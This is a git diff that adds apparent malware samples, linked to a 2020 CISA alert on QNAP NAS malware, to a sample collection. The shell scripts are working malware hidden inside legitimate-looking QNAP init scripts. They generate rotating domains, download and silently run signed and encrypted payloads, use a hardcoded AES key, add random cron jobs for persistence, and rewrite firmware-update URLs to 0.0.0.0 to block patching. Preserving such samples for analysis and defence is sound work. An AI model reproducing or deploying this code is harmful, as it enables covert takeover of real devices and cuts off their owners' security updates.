0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
|
||||
DOMAIN_EXT_A='cf tk ml ga gq'
|
||||
DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
|
||||
cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
|
||||
|
||||
for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
|
||||
for ext in $domainexts; do
|
||||
hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
|
||||
hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
|
||||
hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
|
||||
for host in $hostnames; do
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
|
||||
test "$recentupdate" -eq 1 && exit 0
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ -z $_qsyncd_run_pid ]; then
|
||||
return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
exit 0
|
||||
fi
|
||||
fi
|
||||
XEOF
|
||||
fi
|
||||
chmod 755 "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
|
||||
touch -cr /bin/busybox "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
|
||||
|
||||
crontabargs=$(ps | grep 'cr[o]nd ' | sed -n 's/.*crond[^0-9A-Za-z-]*\(.\+\)/\1/p')
|
||||
trycount=10; trycount=$(( $trycount - 10 ))
|
||||
set x $crontabargs; shift
|
||||
while [ $# -gt 0 ] && [ $trycount -lt 10 ]; do
|
||||
trycount=$(( $trycount + 1 ))
|
||||
getopts ':c:' OPT 2>/dev/null
|
||||
test "$OPT" = 'c' && crontabfile="${OPTARG}/admin" && break
|
||||
test "$OPTIND" -gt 0 && shift "$OPTIND" && OPTIND=1 || break
|
||||
done
|
||||
test "$crontabfile" && test -f "${crontabfile}" || crontabfile='/tmp/cron/crontabs/admin'
|
||||
|
||||
for crontab in "$crontabfile" "${confdir}/crontab"; do
|
||||
if $fgrep "${bdir}/.qpkg/.liveupdate/liveupdate.sh" "$crontab"; then
|
||||
:
|
||||
else
|
||||
cronmins=$(printf '%i' "$(( $RANDOM % 60 ))")
|
||||
cronhour=$(printf '%i' "$(( $RANDOM % 24 ))")
|
||||
cronhour=$(printf '%i,' "$(( ( $cronhour + 8 ) % 24 ))" "$(( ( $cronhour + 16 ) % 24 ))")"$cronhour"
|
||||
echo "$cronmins $cronhour"' * * * '"${bdir}/.qpkg/.liveupdate/liveupdate.sh >/dev/null 2>/dev/null" >> "$crontab"
|
||||
sleep 5
|
||||
fi
|
||||
done
|
||||
|
||||
grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com' >/dev/null && sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/0.0.0.0\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
|
||||
sedexpr='QPKG CENTER XML\|Live Update XML\|FW_XML_ALT'
|
||||
if grep "${sedexpr}" /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com' >/dev/null; then
|
||||
sed -i 's/^ *\('"${sedexpr}"'\)\(.*https\?:\/\/[^\/]*\)\(qnap\.com[^\/]*\)/\1\20.0.0.0/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
|
||||
grep "${sedexpr}" /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com' && sed -i 's/^ *\('"${sedexpr}"'\).*qnap\.com/\1 = /' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
|
||||
fi
|
||||
|
||||
( ( exec >/dev/null 2>&1 </dev/null; "${bdir}/.qpkg/.liveupdate/liveupdate.sh" </dev/null >/dev/null 2>/dev/null & ) & )
|
||||
exit 0
|
@ -0,0 +1 @@
|
||||
https://us-cert.cisa.gov/ncas/alerts/aa20-209a
|
510
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/a569332b52d484f40b910f2f0763b13c085c7d93dcdc7fea0aeb3a3e3366ba5d
Normal file
510
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/a569332b52d484f40b910f2f0763b13c085c7d93dcdc7fea0aeb3a3e3366ba5d
Normal file
@ -0,0 +1,510 @@
|
||||
#!/bin/sh
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
exit 1
|
||||
esac
|
||||
exit 0
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
